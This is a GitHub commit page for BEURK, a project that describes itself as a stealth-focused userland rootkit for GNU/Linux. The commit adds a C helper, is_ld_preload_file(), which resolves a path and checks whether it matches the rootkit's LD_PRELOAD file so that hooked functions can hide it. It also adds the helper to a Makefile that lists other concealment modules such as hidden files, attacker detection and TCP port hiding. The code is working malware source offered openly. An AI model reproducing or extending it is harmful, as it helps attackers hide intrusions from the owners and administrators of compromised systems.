Skip to content

Commit

Permalink
feat(core): add is_ld_preload_file()
Browse files Browse the repository at this point in the history
use readpath() instead of strstr() in hooks functions
to handle relative and absoluth path
  • Loading branch information
chqrly committed Oct 15, 2015
1 parent b57c62e commit 5e9ddb3
Show file tree
Hide file tree
Showing 2 changed files with 43 additions and 0 deletions.
1 change: 1 addition & 0 deletions Makefile
Original file line number Diff line number Diff line change
Expand Up @@ -33,6 +33,7 @@ SOURCES = src/init.c \
src/config.c \
src/debug.c \
src/is_hidden_file.c \
src/is_ld_preload_file.c \
src/is_attacker.c \
src/is_procnet.c \
src/hide_tcp_ports.c \
Expand Down
42 changes: 42 additions & 0 deletions src/is_ld_preload_file.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
/*
* BEURK is an userland rootkit for GNU/Linux, focused around stealth.
* Copyright (C) 2015 unix-thrust
*
* This file is part of BEURK.
*
* BEURK is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* BEURK is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with BEURK. If not, see <http://www.gnu.org/licenses/>.
*/

#include <limits.h> /* PATH_MAX */
#include <stdlib.h> /* realpath(), free()*/
#include <string.h> /* strcmp() */
#include "beurk.h" /* prototype */
#include "config.h" /* FILE, MAX_LEN, MAGIC_STRING, LIBRARY_NAME, ... */
#include "debug.h" /* DEBUG() */


int is_ld_preload_file(const char *file) {
init();
DEBUG(D_INFO, "called is_ld_preload_file()");

char *path;
int ret;

path = realpath(file, NULL);
if (path == NULL)
return 0;
ret = !strcmp(path, LD_PRELOAD);
free(path);
return ret;
}

0 comments on commit 5e9ddb3

Please sign in to comment.